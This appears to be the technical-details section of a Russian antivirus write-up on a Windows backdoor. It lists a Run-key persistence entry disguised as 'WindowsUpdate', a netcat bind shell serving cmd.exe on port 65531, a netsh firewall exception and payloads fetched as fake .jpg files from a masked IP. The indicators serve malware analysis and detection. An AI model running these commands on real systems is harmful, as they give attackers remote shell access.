Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '<SYSTEM32>\nc.exe'
- C:\try.exe
- <SYSTEM32>\nc.exe -L -p 65531 -e cmd.exe
- C:\try.exe (загружен из сети Интернет)
- <SYSTEM32>\nc.exe (загружен из сети Интернет)
- <SYSTEM32>\ipconfig.exe /flushdns
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\nc.exe 1 ENABLE
- %WINDIR%\wget.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\pega[1].jpg
- C:\try.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\wget[1].jpg
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\contador[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\nc[1].jpg
- <SYSTEM32>\nc.exe
- '21#.#05.6.172':80
- 'localhost':1038
- 21#.#05.6.172/image1/wget.jpg
- 21#.#05.6.172/image1/pega.jpg
- 21#.#05.6.172/image1/contador.php?os#############################################
- 21#.#05.6.172/image1/nc.jpg
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''